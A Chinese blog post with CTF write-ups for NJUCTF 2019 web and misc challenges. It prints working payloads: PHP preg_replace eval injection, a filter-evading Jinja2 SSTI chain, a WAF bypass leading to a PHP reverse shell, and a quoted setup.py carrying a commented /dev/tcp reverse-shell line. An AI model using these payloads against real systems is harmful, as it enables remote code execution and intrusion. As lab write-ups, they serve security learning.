

<!DOCTYPE html>
<html lang="zh-Hans" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/favicon.png">
  <link rel="icon" href="/img/favicon.png">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="Jesen">
  <meta name="keywords" content="Jesen,Jesen&#39;s Blog,ctf,writeups,web,渗透,渗透测试">
  
    <meta name="description" content="前言虽然拿了一血但是是靠手速哈哈。 web-replace既然这么出了一定是考replace.  提示php5.6 考虑到preg_replace 在新版本已经废弃。那么就是考preg_replace了。 首页三个框框: 目测是对应preg_replace 三个参数。  preg_replace ( mixed $pattern , mixed $replacement , mixed $subj">
<meta property="og:type" content="article">
<meta property="og:title" content="NJUCTF2019-部分wp">
<meta property="og:url" content="https://jesen.ddwhm.com/2019/11/24/NJUCTF2019.html">
<meta property="og:site_name" content="Jesen&#39;s Blog">
<meta property="og:description" content="前言虽然拿了一血但是是靠手速哈哈。 web-replace既然这么出了一定是考replace.  提示php5.6 考虑到preg_replace 在新版本已经废弃。那么就是考preg_replace了。 首页三个框框: 目测是对应preg_replace 三个参数。  preg_replace ( mixed $pattern , mixed $replacement , mixed $subj">
<meta property="og:locale">
<meta property="og:image" content="https://jesen.ddwhm.com/images/image-20191124193302903.png">
<meta property="og:image" content="https://jesen.ddwhm.com/images/image-20191124193404646.png">
<meta property="og:image" content="https://jesen.ddwhm.com/images/image-20191124193919224.png">
<meta property="og:image" content="https://jesen.ddwhm.com/images/image-20191124193932138.png">
<meta property="og:image" content="https://jesen.ddwhm.com/images/image-20191124193949934.png">
<meta property="article:published_time" content="2019-11-24T11:28:28.000Z">
<meta property="article:modified_time" content="2019-11-24T12:04:27.937Z">
<meta property="article:author" content="Jesen">
<meta property="article:tag" content="CTF">
<meta property="article:tag" content="web">
<meta property="article:tag" content="南京邮电CTF">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="https://jesen.ddwhm.com/images/image-20191124193302903.png">
  
  
  <title>NJUCTF2019-部分wp - Jesen&#39;s Blog</title>

  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4/dist/css/bootstrap.min.css" />


  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/github-markdown-css@4/github-markdown.min.css" />
  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/hint.css@2/hint.min.css" />

  
    
    
      
      <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/highlight.js@10/styles/github-gist.min.css" />
    
  

  
    <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3/dist/jquery.fancybox.min.css" />
  


<!-- 主题依赖的图标库，不要自行修改 -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_ba1fz6golrf.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_lbnruvf0jn.css">


<link  rel="stylesheet" href="/css/main.css" />

<!-- 自定义样式保持在最底部 -->


  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    var CONFIG = {"hostname":"jesen.ddwhm.com","root":"/","version":"1.8.14","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"right","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"copy_btn":true,"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"baidu":null,"google":null,"gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false}},"search_path":"/local-search.xml"};
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
<meta name="generator" content="Hexo 5.4.0"></head>


<body>
  <header style="height: 70vh;">
    <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>Fluid</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                Startseite
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                Archiv
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                Kategorie
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                Etiketten
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                Über mich
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              &nbsp;<i class="iconfont icon-search"></i>&nbsp;
            </a>
          </li>
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">&nbsp;<i
                class="iconfont icon-dark" id="color-toggle-icon"></i>&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

    <div class="banner" id="banner" parallax=true
         style="background: url('/img/default.png') no-repeat center center;
           background-size: cover;">
      <div class="full-bg-img">
        <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
          <div class="page-header text-center fade-in-up">
            <span class="h2" id="subtitle" title="NJUCTF2019-部分wp">
              
            </span>

            
              <div class="mt-3">
  
  
    <span class="post-meta">
      <i class="iconfont icon-date-fill" aria-hidden="true"></i>
      <time datetime="2019-11-24 19:28" pubdate>
        November 24, 2019 pm
      </time>
    </span>
  
</div>

<div class="mt-1">
  
    <span class="post-meta mr-2">
      <i class="iconfont icon-chart"></i>
      3.6k 字
    </span>
  

  
    <span class="post-meta mr-2">
      <i class="iconfont icon-clock-fill"></i>
      
      
      30 分钟
    </span>
  

  
  
</div>

            
          </div>

          
        </div>
      </div>
    </div>
  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="d-none d-lg-block col-lg-2"></div>
    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div class="py-5" id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">NJUCTF2019-部分wp</h1>
            
            <div class="markdown-body">
              <h1 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h1><p>虽然拿了一血但是是靠手速哈哈。</p>
<h1 id="web-replace"><a href="#web-replace" class="headerlink" title="web-replace"></a>web-replace</h1><p>既然这么出了一定是考replace.</p>
<p><img src="/images/image-20191124193302903.png" srcset="/img/loading.gif" lazyload alt="image-20191124193302903"></p>
<p>提示php5.6 考虑到preg_replace 在新版本已经废弃。那么就是考preg_replace了。</p>
<p>首页三个框框:<img src="/images/image-20191124193404646.png" srcset="/img/loading.gif" lazyload alt="image-20191124193404646"></p>
<p>目测是对应preg_replace 三个参数。</p>
<p> <code>preg_replace ( mixed $pattern , mixed $replacement , mixed $subject [, int $limit = -1 [, int &amp;$count ]] ) : mixed</code> </p>
<p>总的来说就是: <code>preg_replace(‘原来的文本’,‘替换的单词’,‘新单词’)</code></p>
<p>那么构造payload: <code>sub=jesen666&amp;pat=.*&amp;rep=eval($_POST[a])&amp;a=system(&#39;cat /flag&#39;);</code></p>
<p>post过去即可。。</p>
<h1 id="web-flask"><a href="#web-flask" class="headerlink" title="web-flask"></a>web-flask</h1><p>这题过于简单。。<img src="/images/image-20191124193919224.png" srcset="/img/loading.gif" lazyload alt="image-20191124193919224"></p>
<p>进门这个点击以后看看，<img src="/images/image-20191124193932138.png" srcset="/img/loading.gif" lazyload alt="image-20191124193932138"></p>
<p>修改以下url:<img src="/images/image-20191124193949934.png" srcset="/img/loading.gif" lazyload alt="image-20191124193949934"></p>
<p>漏洞已经出现，这里直接放出payload。毕竟原理在网上已经有。</p>
<figure class="highlight python"><table><tr><td class="gutter"><div class="code-wrapper"><pre><span class="line">1</span><br></pre></div></td><td class="code"><pre><code class="hljs python">http://nctf2019.x1ct34m.com:<span class="hljs-number">40007</span>/base1&#123;&#123;request[<span class="hljs-string">&#x27;__cl&#x27;</span>+<span class="hljs-string">&#x27;ass__&#x27;</span>].__base__.__base__.__base__[<span class="hljs-string">&#x27;__subcla&#x27;</span>+<span class="hljs-string">&#x27;sses__&#x27;</span>]()[<span class="hljs-number">60</span>][<span class="hljs-string">&#x27;__in&#x27;</span>+<span class="hljs-string">&#x27;it__&#x27;</span>][<span class="hljs-string">&#x27;__&#x27;</span>+<span class="hljs-string">&#x27;glo&#x27;</span>+<span class="hljs-string">&#x27;bal&#x27;</span>+<span class="hljs-string">&#x27;s__&#x27;</span>][<span class="hljs-string">&#x27;__bu&#x27;</span>+<span class="hljs-string">&#x27;iltins__&#x27;</span>][<span class="hljs-string">&#x27;ev&#x27;</span>+<span class="hljs-string">&#x27;al&#x27;</span>](<span class="hljs-string">&#x27;__im&#x27;</span>+<span class="hljs-string">&#x27;port__(&quot;os&quot;).po&#x27;</span>+<span class="hljs-string">&#x27;pen(&quot;cat /f&quot;+&quot;lag&quot;).re&#x27;</span>+<span class="hljs-string">&#x27;ad()&#x27;</span>)&#125;&#125;<br></code></pre></td></tr></table></figure>

<p>这里注意它过滤了flag字符，所以需要拆开flag后用+链接。。。</p>
<h1 id="web-hacker-backdoor"><a href="#web-hacker-backdoor" class="headerlink" title="web-hacker_backdoor"></a>web-hacker_backdoor</h1><p>给出代码</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br>error_reporting(<span class="hljs-number">0</span>);<br><span class="hljs-keyword">if</span>(!<span class="hljs-keyword">isset</span>(<span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;code&#x27;</span>]) || !<span class="hljs-keyword">isset</span>(<span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;useful&#x27;</span>]))&#123;<br>    highlight_file(<span class="hljs-keyword">__file__</span>);<br>&#125;<br><span class="hljs-variable">$code</span> = <span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;code&#x27;</span>];<br><span class="hljs-variable">$usrful</span> = <span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;useful&#x27;</span>];<br><br><span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">waf</span>(<span class="hljs-params"><span class="hljs-variable">$a</span></span>)</span>&#123;<br>    <span class="hljs-variable">$dangerous</span> = get_defined_functions();<br>    array_push(<span class="hljs-variable">$dangerous</span>[<span class="hljs-string">&quot;internal&quot;</span>], <span class="hljs-string">&#x27;eval&#x27;</span>, <span class="hljs-string">&#x27;assert&#x27;</span>);<br>    <span class="hljs-keyword">foreach</span> (<span class="hljs-variable">$dangerous</span>[<span class="hljs-string">&quot;internal&quot;</span>] <span class="hljs-keyword">as</span> <span class="hljs-variable">$bad</span>) &#123;<br>        <span class="hljs-keyword">if</span>(strpos(<span class="hljs-variable">$a</span>,<span class="hljs-variable">$bad</span>) !== <span class="hljs-literal">FALSE</span>)&#123;<br>        <span class="hljs-keyword">return</span> <span class="hljs-literal">False</span>;<br>        <span class="hljs-keyword">break</span>;<br>        &#125;<br>    &#125;<br>    <span class="hljs-keyword">return</span> <span class="hljs-literal">True</span>;<br>&#125;<br><br><span class="hljs-keyword">if</span>(file_exists(<span class="hljs-variable">$usrful</span>))&#123;<br>    <span class="hljs-keyword">if</span>(waf(<span class="hljs-variable">$code</span>))&#123;<br>        <span class="hljs-keyword">eval</span>(<span class="hljs-variable">$code</span>);<br>    &#125;<br>    <span class="hljs-keyword">else</span>&#123;<br>        <span class="hljs-keyword">die</span>(<span class="hljs-string">&quot;oh,不能输入这些函数哦 :) &quot;</span>);<br>    &#125;<br>&#125;<br></code></pre></td></tr></table></figure>

<p>分析以下：需要get传入code和useful参数，useful参数需要是系统已经存在的文件。这里使用file:///etc/passwd</p>
<p>$dangerous数组，把内置函数全部取出，并加入eval和assert来阻止执行。</p>
<h2 id="研究绕过"><a href="#研究绕过" class="headerlink" title="研究绕过"></a>研究绕过</h2><p>这里我们可以在网上百度得到strpos一般是用数组绕过的,但是我在做题时候发现，我没有成功，紧接着查阅php.net文档，发现strpos是大小写敏感的。</p>
<p>那么就简单了。构造  <code>/?code=PhPinfO();&amp;useful=file:///etc/passwd</code>成功绕过。</p>
<h2 id="成功执行命令"><a href="#成功执行命令" class="headerlink" title="成功执行命令"></a>成功执行命令</h2><p>发现禁用了大多数函数，但是没有禁用fsockopen,proc_close和proc_open,那么完全可以反弹shell。</p>
<p>反弹代码：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-variable">$sock</span>=fsockopen(<span class="hljs-string">&#x27;xxxxx&#x27;</span>,<span class="hljs-string">&#x27;xxx&#x27;</span>);<span class="hljs-comment">//ip and port</span><br><span class="hljs-variable">$descriptorspec</span> = <span class="hljs-keyword">array</span>(<span class="hljs-number">0</span> =&gt; <span class="hljs-variable">$sock</span>,<span class="hljs-number">1</span> =&gt; <span class="hljs-variable">$sock</span>,<span class="hljs-number">2</span> =&gt; <span class="hljs-variable">$sock</span>);<br><span class="hljs-variable">$process</span>=proc_open(<span class="hljs-string">&#x27;/bin/sh&#x27;</span>, <span class="hljs-variable">$descriptorspec</span>, <span class="hljs-variable">$pipes</span>);<br>proc_close(<span class="hljs-variable">$process</span>);<br></code></pre></td></tr></table></figure>

<p>构造payload：<code>/?code=EVAL($_GET[a]);&amp;useful=file:///etc/passwd&amp;a=$sock=fsockopen(&#39;xx&#39;,&#39;xxxxx&#39;);$descriptorspec = array(0 =&gt; $sock,1 =&gt; $sock,2 =&gt; $sock);$process=proc_open(&#39;/bin/sh&#39;, $descriptorspec, $pipes);proc_close($process);</code></p>
<p>这里为了观赏性，a是urldecode之后的，在利用的时候需要使用urlencode。</p>
<h1 id="misc-pip-install"><a href="#misc-pip-install" class="headerlink" title="misc-pip install"></a>misc-pip install</h1><p>官方给了个命令让安装<code>pip install --user nctf-2019-installme</code></p>
<p>果断安装，安装后发现源码只有：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">get_flag</span>():</span><br>    <span class="hljs-keyword">return</span> <span class="hljs-string">&#x27;Believe it or not. Flag is already in your machine. Can you find it?&#x27;</span><br></code></pre></td></tr></table></figure>

<p>那么只能去pypi官网，去官网查找<code>nctf-2019-installme</code>包，下载zip源码。在setup.py中发现</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> setuptools <span class="hljs-keyword">import</span> setup, find_packages<br><span class="hljs-keyword">import</span> tempfile<br><span class="hljs-keyword">from</span> os <span class="hljs-keyword">import</span> path, system<br><br>tmp_file = tempfile.gettempdir() + path.sep + <span class="hljs-string">&#x27;.f14g_is_here&#x27;</span><br>f = <span class="hljs-built_in">open</span>(tmp_file, <span class="hljs-string">&#x27;w&#x27;</span>)<br>f.write(<span class="hljs-string">&#x27;TkNURntjNHJlZnVsX2FiMHU3X2V2MWxfcGlwX3A0Y2thZ2V9&#x27;</span>)<br>f.close()<br><br><span class="hljs-comment"># system(&#x27;bash -i &gt;&amp; /dev/tcp/1.1.1.1/7777 0&gt;&amp;1&#x27;)</span><br><span class="hljs-comment"># Ohhhh, that a joke. I won&#x27;t do that. </span><br><br>setup(<br>    name=<span class="hljs-string">&#x27;nctf_2019_installme&#x27;</span>,<br>    version=<span class="hljs-number">0.2</span>,<br>    description=(<br>        <span class="hljs-string">&#x27;Get flagggggggggg!&#x27;</span><br>    ),<br>    author=<span class="hljs-string">&#x27;rmb122&#x27;</span>,<br>    author_email=<span class="hljs-string">&#x27;abuse@anti-spam.cn&#x27;</span>,<br>    license=<span class="hljs-string">&#x27;GPLv3.0&#x27;</span>,<br>    packages=find_packages(),<br>    platforms=[<span class="hljs-string">&quot;all&quot;</span>],<br>    keywords=[<span class="hljs-string">&#x27;nctf&#x27;</span>, <span class="hljs-string">&#x27;getflag&#x27;</span>],<br>    url=<span class="hljs-string">&#x27;http://www.google.com&#x27;</span><br>)<br></code></pre></td></tr></table></figure>

<p>解码base64<code>TkNURntjNHJlZnVsX2FiMHU3X2V2MWxfcGlwX3A0Y2thZ2V9</code>即可得到flag.</p>
<h1 id="结束"><a href="#结束" class="headerlink" title="结束"></a>结束</h1><p>还是很难的（对于我这种萌新来说），最可惜的结束phar那道题，有反序列化，但是没有找到对应的危险类，只有一个孤零零的curl。。。。静等赛后官方wp。唉唉唉。。。</p>
<p>但是。。。我很开心 哈哈哈。</p>

            </div>
            <hr>
            <div>
              <div class="post-metas mb-3">
                
                  <div class="post-meta mr-3">
                    <i class="iconfont icon-category"></i>
                    
                      <a class="hover-with-bg" href="/categories/CTF/">CTF</a>
                    
                  </div>
                
                
                  <div class="post-meta">
                    <i class="iconfont icon-tags"></i>
                    
                      <a class="hover-with-bg" href="/tags/CTF/">CTF</a>
                    
                      <a class="hover-with-bg" href="/tags/web/">web</a>
                    
                      <a class="hover-with-bg" href="/tags/%E5%8D%97%E4%BA%AC%E9%82%AE%E7%94%B5CTF/">南京邮电CTF</a>
                    
                  </div>
                
              </div>
              
                <p class="note note-warning">
                  
                    本博客所有文章除特别声明外，均采用 <a target="_blank" href="https://creativecommons.org/licenses/by-sa/4.0/deed.zh" rel="nofollow noopener noopener">CC BY-SA 4.0 协议</a> ，转载请注明出处！
                  
                </p>
              
              
                <div class="post-prevnext">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2020/03/04/jianjiandandancidaren.html">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">简简单单过词达人各种任务</span>
                        <span class="visible-mobile">Vorheriger</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2019/11/11/zongjie_ctf.html">
                        <span class="hidden-mobile">CTF的一些总结</span>
                        <span class="visible-mobile">Nächster</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>
    
      <div class="d-none d-lg-block col-lg-2 toc-container" id="toc-ctn">
        <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;TOC</p>
  <div class="toc-body" id="toc-body"></div>
</div>

      </div>
    
  </div>
</div>

<!-- Custom -->


    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">Suchen</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v"
                 for="local-search-input">Stichwort</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>
    

    
  </main>

  <footer class="text-center mt-5 py-3">
  <div class="footer-content">
     <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
  </div>
  

  

  
</footer>


  <!-- SCRIPTS -->
  
  <script  src="https://cdn.jsdelivr.net/npm/nprogress@0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/nprogress@0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://cdn.jsdelivr.net/npm/jquery@3/dist/jquery.min.js" ></script>
<script  src="https://cdn.jsdelivr.net/npm/bootstrap@4/dist/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>

<!-- Plugins -->


  <script  src="/js/local-search.js" ></script>



  
    <script  src="/js/img-lazyload.js" ></script>
  



  



  
    <script  src="https://cdn.jsdelivr.net/npm/tocbot@4/dist/tocbot.min.js" ></script>
  
  
    <script  src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3/dist/jquery.fancybox.min.js" ></script>
  
  
    <script  src="https://cdn.jsdelivr.net/npm/anchor-js@4/anchor.min.js" ></script>
  
  
    <script defer src="https://cdn.jsdelivr.net/npm/clipboard@2/dist/clipboard.min.js" ></script>
  






  <script  src="https://cdn.jsdelivr.net/npm/typed.js@2/lib/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var title = document.getElementById('subtitle').title;
      
        typing(title);
      
    })(window, document);
  </script>















<!-- 主题的启动项 保持在最底部 -->
<script  src="/js/boot.js" ></script>


</body>
</html>
